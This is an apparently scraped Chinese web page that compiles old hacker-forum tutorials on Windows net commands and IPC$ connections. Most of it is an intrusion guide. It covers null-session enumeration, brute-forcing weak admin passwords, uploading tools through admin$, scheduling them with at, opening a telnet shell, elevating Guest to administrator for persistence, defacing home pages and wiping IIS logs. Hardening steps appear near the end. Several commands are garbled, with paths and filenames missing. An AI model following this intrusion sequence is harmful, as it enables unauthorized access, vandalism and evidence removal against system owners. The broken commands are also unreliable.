qq群发信息-印章制作大师
![net use](/uploads/image/0922.jpg)
2023年4月3日发(作者:oledbparameter)
我在访问局域网的一台主机时,我把记住密码那一个小筐打上了钩,以后每次想
访问那台机子都不用输入用户名和密码了,可是那台机子对访问的用户都设置了
权限,不同的用户访问权限不一样,我必须要换用户名和密码才能访问那台机子
另一个文件夹,我知道运行controluserpasswords2/高级/管理密码可以清除,
但是我要写成bat,怎样才能在dos下清除已经记住的共享密码?
netuse主机名或IP"8888"/user:"aaa",接着把该bat文件拖放到“开始
→程序→启动”组中,这样一开机,系统就会以aaa为用户名,8888为密码登
录你指定的主机电脑,这样你在任何地方访问它上面的共享文件夹则无需再
输入用户名和密码了。
netlocalgroupadministrators用户名/add添加用户到管理组
netuser用户名查看用户的基本情况
netshare查看计算机IPC$共享资源
netshare共享名查看该共享的情况
netshare共享名=路径设置共享。例如netsharec$=c:
netshare共享名/delete删除IPC$共享
netuseipipc$"密码"/user:"用户名"ipc$连接
nettimeip查看远程计算机上的时间
copy路径:文件名ip共享名复制文件到已经ipc$连接的计算机
ftp服务器地址进入FTP服务器
atip时间命令(注意加盘符)在远程计算机上加一个作业
一、[ping]
用来检查网络是否通畅或网络连接速度的命令。
-t
不间断向目标IP发送数据包
-l
自定义发送数据包的大小,默认为32字节,最高可定制为65500字节
-n
自定义向目标IP发送数据包的次数
说明:
Time=2表示从发出数据包到接受到返回数据包所用的时间
TTL=32判断目标IP的操作系统(128,W2K;250,Unix)
二、nbtstat
该命令使用TCP/IP上的NetBIOS显示协议统计和当前TCP/IP连接,使用该命
令可得以远程主机的NetBIOS信息,如用户名、所属工作组、网卡的MAC地址
-a
使用此参数需要知道远程主机的机器名称,可得到它的NetBIOS信息
-A
使用此参数需要知道远程主机的IP地址,可得到它的NetBIOS信息
-n
列出本地的NetBIOS信息
三、netstat
查看网络状态的命令
-aIP
查看目标机器的所有开放端口,如查看本地机器开放的所有FTP服务、Telnet
服务、邮件服务、WEB服务等。
-rIP
列出当前的路由信息,告之我们目标机器的网关、子网掩码等信息
四、tracert
跟踪路由信息,使用该命令可查出数据从本地机器传输到目标主机所经过的所
有途径
tracertIP
五、net
该命令是网络命令中最重要的一个
netviewIP
查看远程主机的所有共享资源
netuseIP
把远程主机的某个共享资源是非曲直射为本地盘符。
例:NetuseZ:IPsharename表示把IP的共享名为sharename映射成本地的Z
盘
例:netuseIPIPC$"Password"/user:"name"表示与IP建立连接
netstart
使用该命令来启动远程主机上的服务。
netstop
使用该命令停止远程上机上的某个服务
netuser
查看和帐户有关的情况,包括新建帐户、删除帐户、查看特定帐户、激活帐户、
帐户禁用等。
1、netuserabcd123456/add,新建一个用户名为“abcd”密码为“123456”
帐户
2、netuserabcd/del,将用户名为“abcd”的帐户删除
3、netuserabcd/active:no,将用户名为“abcd”的帐户停用
4、netuserabcd/active:yes,将用户名为“abcd”的帐户激活
5、netuserabcd,查看用户名为“abcd”的帐户情况
netlocalgroup
查看所有和用户组有关的信息和进行相关操作。
例:netlocalgroupgroupnameabcd/add将普通组内帐户为“abcd”的用户
提升为“administrator”组成员
nettimeIP
查看目标机器的当前时间
六、at
该命令的作用是安排在特定日期或时间内执行某个特定的命令或程序
attimecommandcomputer表示在指定的计算机上到特定的时间内执行
七、ftp
FTP命令服务
openIP21表示与IP建立FTP连接,连接端口为21,连接成功将提示键入帐户
和密码
der显示该目录内的文件
cd进入指定的文件夹
get下载文件到本地
put上传文件到目标机器(需要权限支持)
delete删目标机器上的某个文件(需要权限支持)
bye退出当前连接
quit退出当前连接
详细如何建立远程IPC$连接&怎么禁止ipc$连接
2008-03-2010:17
1.详细如何建立远程IPC$连接
什么是ipc$
IPC$(InternetProcessConnection)是共享"命名管道"的资源(大家都是这么说的),它是为了让进程间通信而开
放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,
否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁
止导出用户列表的)。
我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远
程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$„„)和系统目录winnt或
windows(admin$)。
所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用
心?我也不知道,代词一个)会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测,寄希
望于获得更高的权限,从而达到不可告人的目的.
解惑:
1)IPC连接是WindowsNT及以上系统中特有的远程网络登陆功能,其功能相当于Unix中的Telnet,由于IPC$功能
需要用到WindowsNT中的很多DLL函数,所以不能在Windows9.x中运行。
也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的
连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)
2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接
3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表
三建立ipc$连接在hack攻击中的作用
就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),
访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果
你以管理员身份登陆,嘿嘿,就不用我在多说了吧,whatuwant,ucando!!
(基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server,还可以考虑开启终
端服务方便控制.怎么样?够厉害吧!)
不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密
码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会
越来越难的:(
因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至
在主机不开启ipc$共享时,你根本就无法连接.
所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致
命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在.
四ipc$与空连接,139,445端口,默认共享的关系
以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透
彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)
1)ipc$与空连接:
不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进
行ipc$连接),自然就不能叫做空连接了.
许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原
因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有
相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).
2)ipc$与139,445端口:
ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过
139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.
3)ipc$与默认共享
默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$„„)和
系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这
些默认共享)
五ipc$连接失败的原因
以下5个原因是比较常见的:
1)你的系统不是NT或以上操作系统;
2)对方没有打开ipc$默认共享
3)对方未开启139或445端口(惑被防火墙屏蔽)
4)你的命令输入有误(比如缺少了空格等)
5)用户名或密码错误(空连接当然无所谓了)
另外,你也可以根据返回的错误号分析原因:
错误号5,拒绝访问:很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows无法找到网络路径:网络有问题;
错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端
口过滤);
错误号67,找不到网络名:你的lanmanworkstation服务未启动;目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连。
错误号1326,未知的用户名或错误密码:原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动。(连接域控会出现此情况)
错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。
关于ipc$连不上的问题比较复杂,除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,
就靠大家自己体会和试验了.
六如何打开目标的IPC$(此段引自相关文章)
首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马,当然,这shell必须是admin
权限的,然后你可以使用shell执行命令netshareipc$来开放目标的ipc$。从上面可以知道,ipc$能否使用
还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法),还是不行的
话(比如有防火墙,杀不了)建议放弃。
七如何防范ipc$入侵
1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)
首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把
RestrictAnonymous=DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务
出现问题等等)
2禁止默认共享
1)察看本地共享资源
运行-cmd-输入netshare
2)删除共享(每次输入一个)
netshareipc$/delete
netshareadmin$/delete
netsharec$/delete
netshared$/delete(如果有e,f,„„可以继续删除)
3)停止server服务
netstopserver/y(重新启动后server服务会重新开启)
4)修改注册表
运行-regedit
server版:找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices
LanmanServerParameters]把AutoShareServer(DWORD)的键值改为:00000000。
pro版:找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]
把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。
3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用
4安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师
5设置复杂密码,防止通过ipc$穷举密码
(本教程不定期更新,欲获得最新版本,请登陆官方网站:菜菜鸟社区原创)
八相关命令
1)建立空连接:
netuseIPipc$""/user:""(一定要注意:这一行命令中包含了3个空格)
2)建立非空连接:
netuseIPipc$"用户名"/user:"密码"(同样有3个空格)
3)映射默认共享:
netusez:IPc$"密码"/user:"用户名"(即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令netusez:IPc$
4)删除一个ipc$连接
netuseIPipc$/del
5)删除共享映射
netusec:/del删除映射的c盘,其他盘类推
netuse*/del删除全部,会有提示要求按y确认
九经典入侵模式
这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)
1.C:>netuse127.0.0.1IPC$""/user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算
攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,
后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
2.C:>127.0.0.1admin$
先复制上去,在流光的Tools目录下就有(这里的$是指admin用户的c:winntsystem32,大家还可以
使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3.C:>nettime127.0.0.1
查查时间,发现127.0.0.1的当前时间是2002/3/19上午11:00,命令成功完成。
4.C:>at127.0.0.111:
用at命令启动吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
5.C:>nettime127.0.0.1
再查查到时间没有?如果127.0.0.1的当前时间是2002/3/19上午11:05,那就准备开始下面的命令。
6.C:>telnet127.0.0.199
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为
我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!
这就要用到ntlm了
7.C:>127.0.0.1admin$
用Copy命令把上传到主机上(也是在《流光》的Tools目录中)。
8.C:WINNTsystem32>ntlm
输入ntlm启动(这里的C:WINNTsystem32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运
行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"netstarttelnet"来开启Telnet服务!
127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什
么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10.C:>netuserguest/active:yes
将对方的Guest用户激活
11.C:>netuserguest1234
将Guest的密码改为1234,或者你要设定的密码
12.C:>netlocalgroupadministratorsguest/add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问
这台计算机)
另:
要建立远程IPC$连接必须具备以下条件:
1、有超管的密码;
2、远程机开启了Sever服务项,一般都开了,除非是高手知道多一点;
3、了解以下NetUse之类的命令。
先用X-scan扫一下哪些机子有ipc漏洞,或者超管密码为空的。比如得到IP192.168.0.1.。先Ping一下,
确保他在线。然后在Windows下的虚拟Dos下(即cmd)输入:
netuse192.168.0.1ipc$"密码“/user:"adminstrator"
运行成功后可以通过本机的注册表或服务项远程连接,在第一个下拉菜单里有该命令。远程更改服务或注册
表。
也可以把肉鸡的共享盘影射到本机的我的电脑。
netusez:192.168.0.1c$
完成后就可以在我的电脑里看到z盘符,即远程机的c盘。
2.如何入侵能建立IPC$空连接的主机
IPC$的定义:IPC$是共享“命名管道”的资源,它对于程序间的通讯很重要。在远程管理计算机和查看计算机的
共享资源时使用。
IPC$的作用:利用IPC$我们可以与目标主机建立一个空的连接(无需用户名与密码),而利用这个空的连接,
我们就可以得到目标主机上的用户列表。
2:这步要使用NET命令,如果你不懂的话建议你快学,NET可是非常强大的命令!(本人正在苦练中)如果你不
懂的话就跟着我做吧。
3:如果知道了对方的用户名和密码就用下面这个命令:
netuse127.0.0.1ipc$"密码"/user:"用户名"
退出的命令是:
netuse127.0.0.1ipc$/delte
相信能知道对方用户名和密码的情况不多,详细说明就不写了,写出进入和退出命令仅供大家拿朋友的机子
做做试验,熟悉一下界面
4:大部分情况下我们都不知道对方机子的用户名和密码。查他IP用ping命令,格式为:ping(空
格)(如果用QQ聊天更简单,现在有QQ显IP补丁,IP一目了然),用追捕查他的操作系统,用户
名等。现在信息都有了,然后大家试试弱智点的密码,如:123,12345,123456,用户名。运气好的话就可以进
入了:)你懒得作字典的话我还有一篇《弱智密码集DIC》,可以去看看:)
5:实在猜不出密码的话我们只有祭上榕哥的大作--流光!运行探测--扫描POP3/FTP/NT/SQL主机,会出现
“主机扫描设置”;在“扫描范围”中分别填写“开始地址”与“结束地址”,这步你可以选择要扫描的IP段,
也可以只填某一IP,扫描主机类型”选择“NT/98”,然后开始扫描,有了NT/98的机器了,(如果单扫某一IP,
我建议扫描主机类型选ALL,选项选中的内容不要取消)可以看看他的机子是什么颜色的,具体表示看下表:
红色:该主机安装了FrontPage扩展。并没有权限设置。如果扫到红色的,你可以打开FrontPage,在打开那
里填上他的IP地址,接着你就知道怎么做了:)
蓝色:表示该主机上安装了FrontPage扩展
黑色:远程执行命令。你可以单击该主机---连接,就可以用DOS命令操作远程计算机,如:dirc:
黄色:直接下载对方SAM文件(SAM文件是NT下储存用户和密码的文件,下载后来后用LC3可以解开)
绿色:将对方SAM文件上传到指定的FTP服务器
6:现在知道了他主机的情况,可以开始探测他的用户列表了!右键点击IPC$主机-探测-探测所有IPC$用户列
表,下面两个对话框的设置都选上,我们只要IPC$管理员的弱口令。在结果点击右键,探测用户列表,
Administrstor(超级用户)直接探测到ADMIN的密码,如果实在不行,我们还可以拿其他用户“开刀”,然后在
想办法让他变成超级用户。
7:得到用户名和密码我们就可以连接了。打开win2000下的(也就是命令提示符)。然后重复第二步
教过的连接连接命令:
netuse127.0.0.1ipc$"密码"/user:"用户名"
成功连接后显示命令成功完成。这样的话那台机子就成了“你的亲戚了”:)
8:现在你可以用copy命令把你想要上传的东西放到他的机子了:)
9:如果你想黑他页面的话找到他的网页所在的目录,如:c:inetpubwwwroot,用命令:
copyc:地址c$inetpubwwwroot
这里的c:指的是你作好的网页,上传替换掉原先的文件就可以改他的主页。
10:以上教的就是教你如何改别人主页。如想要进一步控制对方的主机还需很多步骤,我手累了,你还想学
的话看我第二篇教程吧:)
11:大家到了这步一定要记得擦PP(记录你信息的记录),我推荐小搈的CleanIISLogIIS,简单易用,在对
方机子运行一下就行了:)什么?你连怎么运行程序的命令都不懂?不懂FTP,NET命令还可以原谅,你这样简直是不
可原谅!建议你看看关于DOS指令的书吧,DOS虽比不上windows易用,但对于入侵很有用的!!!
相关命令
建立空连接
netuseIPipc$""/user:""(一定要注意:这一行命令中包含了3个空格)
建立非空连接
netuseIPipc$"用户名"/user:"密码"(同样有3个空格)
映射默认共享
netusez:IPc$"密码"/user:"用户名"(即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令netusez:IPc$
删除一个ipc$连接
netuseIPipc$/del
删除共享映射
netusec:/del删除映射的c盘,其他盘类推
netuse*/del删除全部,会有提示要求按y确认
经典入侵模式
1.C:>netuse127.0.0.1IPC$""/user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果
是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就
不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
2.C:>127.0.0.1admin$
先复制上去,在流光的Tools目录下就有(这里的$是指admin用户的c:winntsystem32,大家
还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3.C:>nettime127.0.0.1
查查时间,发现127.0.0.1的当前时间是2002/3/19上午11:00,命令成功完成。
4.C:>at127.0.0.111:
用at命令启动吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
5.C:>nettime127.0.0.1
再查查到时间没有?如果127.0.0.1的当前时间是2002/3/19上午11:05,那就准备开始下面的命令。
6.C:>telnet127.0.0.199
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算
机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet
服务!这就要用到ntlm了
7.C:>127.0.0.1admin$
用Copy命令把上传到主机上(也是在《流光》的Tools目录中)。
8.C:WINNTsystem32>ntlm
输入ntlm启动(这里的C:WINNTsystem32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机
上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"netstarttelnet"来开启Telnet服务!
127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想
做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10.C:>netuserguest/active:yes
将对方的Guest用户激活
11.C:>netuserguest1234
将Guest的密码改为1234,或者你要设定的密码
12.C:>netlocalgroupadministratorsguest/add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再
次访问这台计算机)
ipc$与空连接,139,445端口,默认共享的关系
本文来自冰风黑客联盟:/article/?id=816
3.怎么禁止ipc$连接
默认共享:
在Windows2000/XP/2003系统中,逻辑分区与Windows目录默认为共享,这是
为管理员管理服务器的方便而设,但却成为了别有用心之徒可趁的安全漏洞。
IPC$
IPC$(InternetProcessConnection)是共享"命名管道"的资源,它是为了让进
程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远
程管理计算机和查看计算机的共享资源时使用。
利用IPC$,连接者可以与目标主机建立一个空的连接,即无需用户名和密码就能
连接主机,当然这样连接是没有任何操作权限的。但利用这个空的连接,连接者
可以得到目标主机上的用户列表。
利用获得的用户列表,就可以猜密码,或者穷举密码,从而获得更高,甚至管理
员权限。
只要通过IPC$,获得足够的权限,就可以在主机上运行程序、创建用户、把主
机上C、D、E等逻辑分区共享给入侵者,主机上的所有资料,包括QQ密码、email
帐号密码、甚至存在电脑里的信用卡资料都会暴露在入侵者面前。
要防止别人用ipc$和默认共享入侵,需要禁止ipc$空连接,避免入侵者取得用
户列表,并取消默认共享。
禁止ipc$空连接进行枚举
运行regedit,找到如下组键
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把
RestrictAnonymous=DWORD的键值改为:00000001
关闭139与445端口
ipc$连接是需要139或445端口来支持的,139端口的开启表示netbios协议的
应用,通过139,445(win2000)端口实现对共享文件/打印机的访问,因此关闭139
与445端口可以禁止ipc$连接。
关闭139端口可以通过禁用netbios协议来实现。
139端口关闭方法:控制面板->网络和拨号连接->本地连接,点属性按钮进入
“本地连接属性”页面,选择“Internet协议(TCP/IP)”,然后点属性按钮,
在弹出窗口点高级按钮,然后选择WINS标签,点“禁用TCP/IP上的
NetBios”,最后确定退出。
445端口关闭方法:运行regedit,找到项
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSet
ServicesNetBTParameters],建立名称为SMBDeviceEnabled,DWORD类型的
键,值为00000000。
关闭默认共享:
1、删除已有的共享
运行
netshareipc$/del
netshareadmin$/del
netsharec$/del
netshared$/del
„„„„(有几个删几个)
或者在“控制面板->管理工具->计算机管理”里的“共享文件夹->共享”中删
除。
2、修改注册表
删除了共享,下一次启动时还是会自动打开共享,要永久关闭需要修改注册表
server版:[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices
LanmanServerParameters]把AutoShareServer(DWORD)的键值改
为:00000000。
pro版:
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServer
Parameters]把AutoShareWks(DWORD)的键值改为:00000000。
==
以下四种方法可以参考一下:
A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册
表。
1,先把已有的删除
netshareipc$/del
netshareadmin$/del
netsharec$/del
„„„„(有几个删几个)
2,禁止建立空连接
首先运行regedit,找到如下主键
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]
把RestrictAnonymous(DWORD)的键值改为:00000001。
3,禁止自动打开默认共享
对于server版,找到如下主键
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerPara
meters]把AutoShareServer(DWORD)的键值改为:00000000。
对于pro版,则是
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParamet
ers]把Au
toShareWks(DWORD)的键值改为:00000000。
B、另一种是关闭ipc$和默认共享依赖的服务(不推荐)
netstoplanmanserver
可能会有提示说,XXX服务也会关闭是否继续。因为还有些次要的服务依赖于
lanmanserver。一般情况按y继续就可以了。
C、最简单的办法是设置复杂密码,防止通过ipc$穷举密码。但如果你有其他漏
洞,ipc$将为进一步入侵提供方便。
D、还有一个办法就是装防火墙,或者端口过滤。
更多推荐
net use
发布评论